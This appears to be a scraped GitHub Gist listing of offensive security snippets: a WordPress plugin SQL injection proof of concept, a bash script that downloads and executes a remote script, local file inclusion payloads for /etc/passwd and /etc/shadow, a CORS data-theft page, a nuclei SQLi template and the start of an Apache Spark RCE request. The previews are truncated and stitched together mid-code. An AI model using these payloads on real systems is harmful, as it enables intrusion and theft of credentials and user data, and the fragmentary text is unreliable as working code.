PikPikcU pikpikcu

pikpikcu / poc wp.md
Last active April 22, 2024 13:41
POC WP

WordPress Plugin - Google Review Slider 6.1 SQL Injection

poc:

GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1

sqlmap result:

sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
#!/bin/bash
wget -O ng.sh https://github.com/kmille36/Docker-Ubuntu-Desktop-NoMachine/raw/main/ngrok.sh > /dev/null 2>&1
chmod +x ng.sh
./ng.sh
function goto
{
label=$1
cd
```zshrc
#▄███████▄ ▄████████ ▄█ █▄ ▄████████ ▄████████
#██▀ ▄██ ███ ███ ███ ███ ███ ███ ███ ███
# ▄███▀ ███ █▀ ███ ███ ███ ███ ███ █▀
#▀█▀▄███▀▄▄ ███ ▄███▄▄▄▄███▄▄ ▄███▄▄▄▄██▀ ███
# ▄███▀ ▀ ▀███████████ ▀▀███▀▀▀▀███▀ ▀▀███▀▀▀▀▀ ███
#▄███▀ ███ ███ ███ ▀███████████ ███ █▄
#███▄ ▄█ ▄█ ███ ███ ███ ███ ███ ███ ███
#▀████████▀ ▄████████▀ ███ █▀ ███ ███ ████████▀
# ███ ███
```
pikpikcu / lfi.txt
Created August 29, 2020 10:11
lfi payloads
/etc/master.passwd
/master.passwd
/etc/passwd
/etc/shadow%00
/etc/passwd
/etc/passwd%00
../etc/passwd
../etc/passwd%00
../../etc/passwd
../../etc/passwd%00
layout: post
title: xss cheat sheet

# xss-cheat-sheet

# Basics Xss

HTML Context - Simple Tag Injection

Dorks are cool
Dorks for Google, Shodan and BinaryEdge
Only for use on bug bounty programs or in coordination with a legal security assessment.
I am in no way responsible for the usage of these search queries.
Be responsible thanks - https://www.bugcrowd.com/resource/what-is-responsible-disclosure/
This repository is "under construction" feel free to make pull requests :-)
<html>
<body>
<button type='button' onclick='cors()'>CORS</button>
<p id='demo'></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var a = this.responseText; // Sensitive data from niche.co about user account
pikpikcu / sqli2.yaml
Created September 2, 2020 08:26 — forked from 0x240x23elu/sqli2.yaml
Basic SQL Injection Detections nuclei Template
id: SQLInjection_ERROR
info:
  name: SQLINJECTION Detection
  author: 0x240x23elu & OFJAAAH
  severity: High
requests:
  - method: GET

Apache Spark RCE

POST /v1/submissions/create HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 619
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{